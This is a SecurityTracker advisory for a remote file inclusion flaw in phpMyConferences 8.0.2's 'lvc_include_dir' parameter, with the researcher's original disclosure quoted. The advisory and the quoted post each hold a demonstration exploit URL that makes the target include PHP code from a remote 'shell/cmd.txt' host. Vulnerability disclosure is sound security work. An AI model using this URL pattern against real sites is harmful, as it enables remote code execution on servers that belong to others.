SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   phpMyConferences Vendors:   phpMyConferences
phpMyConferences Include File Bug in 'lvc_include_dir' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017065
SecurityTracker URL:  http://securitytracker.com/id/1017065
CVE Reference:   CVE-2003-1148   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Oct 16 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 8.0.2
Description:   x_w0x reported a vulnerability in phpMyConferences. A remote user can include and execute arbitrary code on the target system.

The 'config.inc.php' file does not properly validate user-supplied input in the 'lvc_include_dir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The 'new-visitor.inc.php' file is also affected.

A demonstration exploit URL is provided:

http://[target]/phpMyConferences_8.0.2/common/visiteurs/include/config.inc.php?lvc_include_dir=http://shell/cmd.txt?

[Editor's note: The vulnerability is due to an underlying vulnerability in "Les Visiteurs", which was reported by Matthieu Peschaud in October 2003; see Alert ID 1008011, CVE-2003-1148.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sedre.loria.fr/phpMyConference/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FW: Rmote File Include


#########################################################################
# phpMyConferences <= 8.0.2 Remote File Inclusion
# Download Source :
http://sedre.loria.fr/phpMyConference/phpMyConferences_8.0.2.zip
#
# Found By        : x_w0x
# Contacte : x_w0x@hotmail.com
########################################################################
file ;
config.inc.php
########################################################################
bugs ;

include($lvc_include_dir.'lang/english.inc.php')########################################################################
exmple and methode exploit ;
http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/config.inc.php?lvc_include_dirr=http://shell/cmd.txt?
########################################################################
Thanks;
_________________________________________________________________
http://www.msn.fr/newhotmail/Default.asp?Ath=f

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC